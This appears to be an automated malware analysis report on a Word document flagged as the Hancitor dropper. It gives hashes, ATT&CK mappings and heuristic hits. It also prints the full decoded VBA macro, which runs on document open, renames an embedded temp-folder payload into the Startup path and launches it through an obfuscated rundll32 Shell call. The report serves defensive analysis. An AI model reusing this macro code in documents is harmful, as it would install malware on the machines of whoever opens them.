Win.Packed.Hancitor-9868784-0 Office (OLE) malware analysis — malicious · a7e1f299e259e216

MALICIOUS

Office (OLE)

885.0 KB Created: 2021-05-31 08:51:00 Authoring application: Microsoft Office Word First seen: 2021-06-13

MD5: e0241b83418c182bc3f54c15576fdd88 SHA-1: 27c1bb07d3663ca0d5b2ec01b595aa760f252286 SHA-256: a7e1f299e259e2169c53cba2439bd15fc0cf1fda7fbe3bcbc8ab40fe1e06e2bb

510 Risk Score

Malware Insights

Win.Packed.Hancitor-9868784-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains a VBA macro with a Document_Open subroutine that executes a Shell command. This command uses 'rundll32.exe' to execute a file named 'ket.t' located in the startup path, which is likely a second-stage payload. The embedded executable artifact and ClamAV detection further support its malicious nature. The macro also attempts to search for and rename a file named 'jax.k' from the temporary directory to 'ket.t' in the startup path.

Heuristics 13

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
ClamAV: Win.Packed.Hancitor-9868784-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Packed.Hancitor-9868784-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

Shell ("rundl" & "l32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,YAKNPEPKBPI")

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
   Set FSO = CreateObject("Scripting.FileSystemObject")
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1650 bytes
SHA-256: `d8890572aaa639658f37408a9e5398e7edb2791909f68499ba70c446096a0c55`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Compare Text Option Explicit Dim pafs As String Private Sub Document_Open() Dim vcbc As String vcbc = Options.DefaultFilePath(wdStartupPath) Dim xc xc = "texmp" If Dir(vcbc & "\ket.t") = "" Then Call yyy Call xxx If Len(pafs) > 2 Then Call nam(pafs) Dim ued As String ued = ".exe" Shell ("rundl" & "l32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,YAKNPEPKBPI") End If End If End Sub Sub yyy() Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.TypeBackspace Selection.Copy End Sub Sub xxx() Dim usx usx = Options.DefaultFilePath(wdTempFilePath) Dim FSO As Object Set FSO = CreateObject("Scripting.FileSystemObject") Search FSO.GetFolder(usx) End Sub Sub Search(mds As Object) Dim Nedc As Object For Each Nedc In mds.SubFolders Search Nedc Next Nedc Dim Ters As Object For Each Ters In mds.Files If Ters.Name = "jax.k" Then pafs = Ters End If Next Ters Exit Sub ErrHandle: Err.Clear End Sub Attribute VB_Name = "Module1" Sub nam(pafs As String) Name pafs As Options.DefaultFilePath(wdStartupPath) & "\" & "ket.t" End Sub
`embedded_office_0008ea68.exe`	embedded-pe	Office MZ+PE at offset 0x8EA68	321944 bytes
SHA-256: `930fc0e31f8853d8ff944df29eec047ed14ebd787016b118648ada16981e2794`
Detection ClamAV: Win.Packed.Hancitor-9868784-0 Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1683931119/Ole10Native	292634 bytes
SHA-256: `21595cb29bd27c1d87fc7c9ed9e22364c6d087573a648ce45e6f523d7b8397cb`
Detection ClamAV: Win.Packed.Hancitor-9868784-0 Obfuscation or payload: unlikely
`ole10native_00_jax.k`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1683931119/Ole10Native; display_name=jax.k; full_path=C:\Users\MyPc\AppData\Local\Temp\jax.k; temp_path=; def_file=	292352 bytes
SHA-256: `ca840820efcd99f62cfe38e230354ea0ea968476dafb56cd7922ceb547baffe2`
Detection ClamAV: Win.Packed.Hancitor-9868784-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.